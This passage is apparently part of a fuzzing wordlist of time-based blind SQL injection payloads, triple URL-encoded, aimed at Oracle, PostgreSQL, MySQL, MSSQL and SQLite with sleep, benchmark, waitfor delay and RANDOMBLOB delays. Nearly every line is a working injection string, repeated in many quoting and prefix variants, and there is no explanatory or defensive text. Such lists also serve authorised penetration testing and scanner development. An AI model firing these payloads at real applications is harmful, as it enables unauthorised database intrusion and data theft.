x%252522dbms_pipe.receive_message%252528%252528%252527a%252527%252529%25252C10%252529/%25252A%25252A/
x%252522dbms_pipe.receive_message%252528%252528%252527a%252527%252529%25252C10%252529%252523
x%252527AND%252520%25255BRANDNUM%25255D%25253DDBMS_PIPE.RECEIVE_MESSAGE%252528%252527%25255BRANDSTR%25255D%252527%25252C%25255BSLEEPTIME%25255D%252529--
x%252527AND%252520%25255BRANDNUM%25255D%25253DDBMS_PIPE.RECEIVE_MESSAGE%252528%252527%25255BRANDSTR%25255D%252527%25252C%25255BSLEEPTIME%25255D%252529/%25252A%25252A/
x%252527dbms_pipe.receive_message%252528%252528%252527a%252527%252529%25252C10%252529/%25252A%25252A/
x%252527dbms_pipe.receive_message%252528%252528%252527a%252527%252529%25252C10%252529%252523

#PostGreSQL
x%252527AND%252520%25255BRANDNUM%25255D%25253D%252528SELECT%252520%25255BRANDNUM%25255D%252520FROM%252520PG_SLEEP%252528%25255BSLEEPTIME%25255D%252529%252529/%25252A%25252A/
x%252527AND%252520%25255BRANDNUM%25255D%25253D%252528SELECT%252520COUNT%252528%25252A%252529%252520FROM%252520GENERATE_SERIES%2525281%25252C%25255BSLEEPTIME%25255D000000%252529%252529%252523
x%252522AND%252520%25255BRANDNUM%25255D%25253D%252528SELECT%252520%25255BRANDNUM%25255D%252520FROM%252520PG_SLEEP%252528%25255BSLEEPTIME%25255D%252529%252529/%25252A%25252A/
x%252522AND%252520%25255BRANDNUM%25255D%25253D%252528SELECT%252520COUNT%252528%25252A%252529%252520FROM%252520GENERATE_SERIES%2525281%25252C%25255BSLEEPTIME%25255D000000%252529%252529%252523
AND%252520%25255BRANDNUM%25255D%25253D%252528SELECT%252520%25255BRANDNUM%25255D%252520FROM%252520PG_SLEEP%252528%25255BSLEEPTIME%25255D%252529%252529/%25252A%25252A/
AND%252520%25255BRANDNUM%25255D%25253D%252528SELECT%252520COUNT%252528%25252A%252529%252520FROM%252520GENERATE_SERIES%2525281%25252C%25255BSLEEPTIME%25255D000000%252529%252529%252523

#Extra
x%252527XOR%252528if%252528now%252528%252529%25253Dsysdate%252528%252529%25252Csleep%2525286%252529%25252C0%252529%252529XOR%252527Z
x%252522XOR%252528if%252528now%252528%252529%25253Dsysdate%252528%252529%25252Csleep%2525286%252529%25252C0%252529%252529XOR%252527Z

Generic Time Based
sleep%2525285%252529%252523
1%252520or%252520sleep%2525285%252529%252523
%252522%252520or%252520sleep%2525285%252529%252523
%252527%252520or%252520sleep%2525285%252529%252523
%252522%252520or%252520sleep%2525285%252529%25253D%252522
%252527%252520or%252520sleep%2525285%252529%25253D%252527
1%252529%252520or%252520sleep%2525285%252529%252523
%252522%252529%252520or%252520sleep%2525285%252529%25253D%252522
%252527%252529%252520or%252520sleep%2525285%252529%25253D%252527
1%252529%252529%252520or%252520sleep%2525285%252529%252523
%252522%252529%252529%252520or%252520sleep%2525285%252529%25253D%252522
%252527%252529%252529%252520or%252520sleep%2525285%252529%25253D%252527
%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
%252527%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
%252522%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
%252527%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
%252522%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
%252527%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
%252522%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
1%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
%252522%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
%252527%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
1%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
%252522%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
%252527%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
1%252529%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
%252522%252529%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
%252527%252529%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
pg_sleep%2525285%252529--
1%252520or%252520pg_sleep%2525285%252529--
%252522%252520or%252520pg_sleep%2525285%252529--
%252527%252520or%252520pg_sleep%2525285%252529--
1%252529%252520or%252520pg_sleep%2525285%252529--
%252522%252529%252520or%252520pg_sleep%2525285%252529--
%252527%252529%252520or%252520pg_sleep%2525285%252529--
1%252529%252529%252520or%252520pg_sleep%2525285%252529--
%252522%252529%252529%252520or%252520pg_sleep%2525285%252529--
%252527%252529%252529%252520or%252520pg_sleep%2525285%252529--
AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529bAKL%252529%252520AND%252520%252527vRxe%252527%25253D%252527vRxe
AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529YjoC%252529%252520AND%252520%252527%252525%252527%25253D%252527
AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529nQIP%252529
AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529nQIP%252529--
AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529nQIP%252529%252523
SLEEP%2525285%252529%252523
SLEEP%2525285%252529--
SLEEP%2525285%252529%25253D%252522
SLEEP%2525285%252529%25253D%252527
or%252520SLEEP%2525285%252529
or%252520SLEEP%2525285%252529%252523
or%252520SLEEP%2525285%252529--
or%252520SLEEP%2525285%252529%25253D%252522
or%252520SLEEP%2525285%252529%25253D%252527
waitfor%252520delay%252520%25252700%25253A00%25253A05%252527
waitfor%252520delay%252520%25252700%25253A00%25253A05%252527--
waitfor%252520delay%252520%25252700%25253A00%25253A05%252527%252523
benchmark%25252850000000%25252CMD5%2525281%252529%252529
benchmark%25252850000000%25252CMD5%2525281%252529%252529--
benchmark%25252850000000%25252CMD5%2525281%252529%252529%252523
or%252520benchmark%25252850000000%25252CMD5%2525281%252529%252529
or%252520benchmark%25252850000000%25252CMD5%2525281%252529%252529--
or%252520benchmark%25252850000000%25252CMD5%2525281%252529%252529%252523
pg_SLEEP%2525285%252529
pg_SLEEP%2525285%252529--
pg_SLEEP%2525285%252529%252523
or%252520pg_SLEEP%2525285%252529
or%252520pg_SLEEP%2525285%252529--
or%252520pg_SLEEP%2525285%252529%252523
%252527%25255C%252522
AnD%252520SLEEP%2525285%252529
AnD%252520SLEEP%2525285%252529--
AnD%252520SLEEP%2525285%252529%252523
%252526%252526SLEEP%2525285%252529
%252526%252526SLEEP%2525285%252529--
%252526%252526SLEEP%2525285%252529%252523
%252527%252520AnD%252520SLEEP%2525285%252529%252520ANd%252520%2525271
%252527%252526%252526SLEEP%2525285%252529%252526%252526%2525271
ORDER%252520BY%252520SLEEP%2525285%252529
ORDER%252520BY%252520SLEEP%2525285%252529--
ORDER%252520BY%252520SLEEP%2525285%252529%252523
%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529ecMj%252529
%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529ecMj%252529%252523
%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529ecMj%252529--
%25252Bbenchmark%2525283200%25252CSHA1%2525281%252529%252529%25252B%252527
%25252B%252520SLEEP%25252810%252529%252520%25252B%252520%252527
RANDOMBLOB%252528500000000/2%252529
AND%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%252528500000000/2%252529%252529%252529%252529
OR%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%252528500000000/2%252529%252529%252529%252529
RANDOMBLOB%2525281000000000/2%252529
AND%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%2525281000000000/2%252529%252529%252529%252529
OR%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%2525281000000000/2%252529%252529%252529%252529
SLEEP%2525281%252529/%25252A%252527%252520or%252520SLEEP%2525281%252529%252520or%252520%252527%252522%252520or%252520SLEEP%2525281%252529%252520or%252520%252522%25252A/

x%252522sleep%2525285%252529%252523
x%2525221%252520or%252520sleep%2525285%252529%252523
x%252522%252522%252520or%252520sleep%2525285%252529%252523
x%252522%252527%252520or%252520sleep%2525285%252529%252523
x%252522%252522%252520or%252520sleep%2525285%252529%25253D%252522
x%252522%252527%252520or%252520sleep%2525285%252529%25253D%252527
x%2525221%252529%252520or%252520sleep%2525285%252529%252523
x%252522%252522%252529%252520or%252520sleep%2525285%252529%25253D%252522
x%252522%252527%252529%252520or%252520sleep%2525285%252529%25253D%252527
x%2525221%252529%252529%252520or%252520sleep%2525285%252529%252523
x%252522%252522%252529%252529%252520or%252520sleep%2525285%252529%25253D%252522
x%252522%252527%252529%252529%252520or%252520sleep%2525285%252529%25253D%252527
x%252522%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252522%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252522%252527%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252522%252522%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252522%252527%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252522%252522%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252522%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252522%252527%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252522%252522%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252522benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%2525221%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252522%252522%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252522%252527%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%2525221%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252522%252522%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252522%252527%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%2525221%252529%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252522%252522%252529%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252522%252527%252529%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252522pg_sleep%2525285%252529--
x%2525221%252520or%252520pg_sleep%2525285%252529--
x%252522%252522%252520or%252520pg_sleep%2525285%252529--
x%252522%252527%252520or%252520pg_sleep%2525285%252529--
x%2525221%252529%252520or%252520pg_sleep%2525285%252529--
x%252522%252522%252529%252520or%252520pg_sleep%2525285%252529--
x%252522%252527%252529%252520or%252520pg_sleep%2525285%252529--
x%2525221%252529%252529%252520or%252520pg_sleep%2525285%252529--
x%252522%252522%252529%252529%252520or%252520pg_sleep%2525285%252529--
x%252522%252527%252529%252529%252520or%252520pg_sleep%2525285%252529--
x%252522AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529bAKL%252529%252520AND%252520%252527vRxe%252527%25253D%252527vRxe
x%252522AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529YjoC%252529%252520AND%252520%252527%252525%252527%25253D%252527
x%252522AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529nQIP%252529
x%252522AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529nQIP%252529--
x%252522AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529nQIP%252529%252523
x%252522SLEEP%2525285%252529%252523
x%252522SLEEP%2525285%252529--
x%252522SLEEP%2525285%252529%25253D%252522
x%252522SLEEP%2525285%252529%25253D%252527
x%252522or%252520SLEEP%2525285%252529
x%252522or%252520SLEEP%2525285%252529%252523
x%252522or%252520SLEEP%2525285%252529--
x%252522or%252520SLEEP%2525285%252529%25253D%252522
x%252522or%252520SLEEP%2525285%252529%25253D%252527
x%252522waitfor%252520delay%252520%25252700%25253A00%25253A05%252527
x%252522waitfor%252520delay%252520%25252700%25253A00%25253A05%252527--
x%252522waitfor%252520delay%252520%25252700%25253A00%25253A05%252527%252523
x%252522benchmark%25252850000000%25252CMD5%2525281%252529%252529
x%252522benchmark%25252850000000%25252CMD5%2525281%252529%252529--
x%252522benchmark%25252850000000%25252CMD5%2525281%252529%252529%252523
x%252522or%252520benchmark%25252850000000%25252CMD5%2525281%252529%252529
x%252522or%252520benchmark%25252850000000%25252CMD5%2525281%252529%252529--
x%252522or%252520benchmark%25252850000000%25252CMD5%2525281%252529%252529%252523
x%252522pg_SLEEP%2525285%252529
x%252522pg_SLEEP%2525285%252529--
x%252522pg_SLEEP%2525285%252529%252523
x%252522or%252520pg_SLEEP%2525285%252529
x%252522or%252520pg_SLEEP%2525285%252529--
x%252522or%252520pg_SLEEP%2525285%252529%252523
x%252522%252527%25255C%252522
x%252522AnD%252520SLEEP%2525285%252529
x%252522AnD%252520SLEEP%2525285%252529--
x%252522AnD%252520SLEEP%2525285%252529%252523
x%252522%252526%252526SLEEP%2525285%252529
x%252522%252526%252526SLEEP%2525285%252529--
x%252522%252526%252526SLEEP%2525285%252529%252523
x%252522%252527%252520AnD%252520SLEEP%2525285%252529%252520ANd%252520%2525271
x%252522%252527%252526%252526SLEEP%2525285%252529%252526%252526%2525271
x%252522ORDER%252520BY%252520SLEEP%2525285%252529
x%252522ORDER%252520BY%252520SLEEP%2525285%252529--
x%252522ORDER%252520BY%252520SLEEP%2525285%252529%252523
x%252522%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529ecMj%252529
x%252522%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529ecMj%252529%252523
x%252522%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529ecMj%252529--
x%252522%25252Bbenchmark%2525283200%25252CSHA1%2525281%252529%252529%25252B%252527
x%252522%25252B%252520SLEEP%25252810%252529%252520%25252B%252520%252527
x%252522RANDOMBLOB%252528500000000/2%252529
x%252522AND%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%252528500000000/2%252529%252529%252529%252529
x%252522OR%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%252528500000000/2%252529%252529%252529%252529
x%252522RANDOMBLOB%2525281000000000/2%252529
x%252522AND%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%2525281000000000/2%252529%252529%252529%252529
x%252522OR%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%2525281000000000/2%252529%252529%252529%252529
x%252522SLEEP%2525281%252529/%25252A%252527%252520or%252520SLEEP%2525281%252529%252520or%252520%252527%252522%252520or%252520SLEEP%2525281%252529%252520or%252520%252522%25252A/

x%252527sleep%2525285%252529%252523
x%2525271%252520or%252520sleep%2525285%252529%252523
x%252527%252522%252520or%252520sleep%2525285%252529%252523
x%252527%252527%252520or%252520sleep%2525285%252529%252523
x%252527%252522%252520or%252520sleep%2525285%252529%25253D%252522
x%252527%252527%252520or%252520sleep%2525285%252529%25253D%252527
x%2525271%252529%252520or%252520sleep%2525285%252529%252523
x%252527%252522%252529%252520or%252520sleep%2525285%252529%25253D%252522
x%252527%252527%252529%252520or%252520sleep%2525285%252529%25253D%252527
x%2525271%252529%252529%252520or%252520sleep%2525285%252529%252523
x%252527%252522%252529%252529%252520or%252520sleep%2525285%252529%25253D%252522
x%252527%252527%252529%252529%252520or%252520sleep%2525285%252529%25253D%252527
x%252527%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252527%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252527%252527%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252527%252522%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252527%252527%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252527%252522%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252527%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252527%252527%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252527%252522%252529%252529%25253Bwaitfor%252520delay%252520%2525270%25253A0%25253A5%252527--
x%252527benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%2525271%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252527%252522%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252527%252527%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%2525271%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252527%252522%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252527%252527%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%2525271%252529%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252527%252522%252529%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252527%252527%252529%252529%252520or%252520benchmark%25252810000000%25252CMD5%2525281%252529%252529%252523
x%252527pg_sleep%2525285%252529--
x%2525271%252520or%252520pg_sleep%2525285%252529--
x%252527%252522%252520or%252520pg_sleep%2525285%252529--
x%252527%252527%252520or%252520pg_sleep%2525285%252529--
x%2525271%252529%252520or%252520pg_sleep%2525285%252529--
x%252527%252522%252529%252520or%252520pg_sleep%2525285%252529--
x%252527%252527%252529%252520or%252520pg_sleep%2525285%252529--
x%2525271%252529%252529%252520or%252520pg_sleep%2525285%252529--
x%252527%252522%252529%252529%252520or%252520pg_sleep%2525285%252529--
x%252527%252527%252529%252529%252520or%252520pg_sleep%2525285%252529--
x%252527AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529bAKL%252529%252520AND%252520%252527vRxe%252527%25253D%252527vRxe
x%252527AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529YjoC%252529%252520AND%252520%252527%252525%252527%25253D%252527
x%252527AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529nQIP%252529
x%252527AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529nQIP%252529--
x%252527AND%252520%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529nQIP%252529%252523
x%252527SLEEP%2525285%252529%252523
x%252527SLEEP%2525285%252529--
x%252527SLEEP%2525285%252529%25253D%252522
x%252527SLEEP%2525285%252529%25253D%252527
x%252527or%252520SLEEP%2525285%252529
x%252527or%252520SLEEP%2525285%252529%252523
x%252527or%252520SLEEP%2525285%252529--
x%252527or%252520SLEEP%2525285%252529%25253D%252522
x%252527or%252520SLEEP%2525285%252529%25253D%252527
x%252527waitfor%252520delay%252520%25252700%25253A00%25253A05%252527
x%252527waitfor%252520delay%252520%25252700%25253A00%25253A05%252527--
x%252527waitfor%252520delay%252520%25252700%25253A00%25253A05%252527%252523
x%252527benchmark%25252850000000%25252CMD5%2525281%252529%252529
x%252527benchmark%25252850000000%25252CMD5%2525281%252529%252529--
x%252527benchmark%25252850000000%25252CMD5%2525281%252529%252529%252523
x%252527or%252520benchmark%25252850000000%25252CMD5%2525281%252529%252529
x%252527or%252520benchmark%25252850000000%25252CMD5%2525281%252529%252529--
x%252527or%252520benchmark%25252850000000%25252CMD5%2525281%252529%252529%252523
x%252527pg_SLEEP%2525285%252529
x%252527pg_SLEEP%2525285%252529--
x%252527pg_SLEEP%2525285%252529%252523
x%252527or%252520pg_SLEEP%2525285%252529
x%252527or%252520pg_SLEEP%2525285%252529--
x%252527or%252520pg_SLEEP%2525285%252529%252523
x%252527%252527%25255C%252522
x%252527AnD%252520SLEEP%2525285%252529
x%252527AnD%252520SLEEP%2525285%252529--
x%252527AnD%252520SLEEP%2525285%252529%252523
x%252527%252526%252526SLEEP%2525285%252529
x%252527%252526%252526SLEEP%2525285%252529--
x%252527%252526%252526SLEEP%2525285%252529%252523
x%252527%252527%252520AnD%252520SLEEP%2525285%252529%252520ANd%252520%2525271
x%252527%252527%252526%252526SLEEP%2525285%252529%252526%252526%2525271
x%252527ORDER%252520BY%252520SLEEP%2525285%252529
x%252527ORDER%252520BY%252520SLEEP%2525285%252529--
x%252527ORDER%252520BY%252520SLEEP%2525285%252529%252523
x%252527%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529ecMj%252529
x%252527%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529ecMj%252529%252523
x%252527%252528SELECT%252520%25252A%252520FROM%252520%252528SELECT%252528SLEEP%2525285%252529%252529%252529ecMj%252529--
x%252527%25252Bbenchmark%2525283200%25252CSHA1%2525281%252529%252529%25252B%252527
x%252527%25252B%252520SLEEP%25252810%252529%252520%25252B%252520%252527
x%252527RANDOMBLOB%252528500000000/2%252529
x%252527AND%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%252528500000000/2%252529%252529%252529%252529
x%252527OR%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%252528500000000/2%252529%252529%252529%252529
x%252527RANDOMBLOB%2525281000000000/2%252529
x%252527AND%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%2525281000000000/2%252529%252529%252529%252529
x%252527OR%2525202947%25253DLIKE%252528%252527ABCDEFG%252527%25252CUPPER%252528HEX%252528RANDOMBLOB%2525281000000000/2%252529%252529%252529%252529
x%252527SLEEP%2525281%252529/%25252A%252527%252520or%252520SLEEP%2525281%252529%252520or%252520%252527%252522%252520or%252520SLEEP%2525281%252529%252520or%252520%252522%25252A/

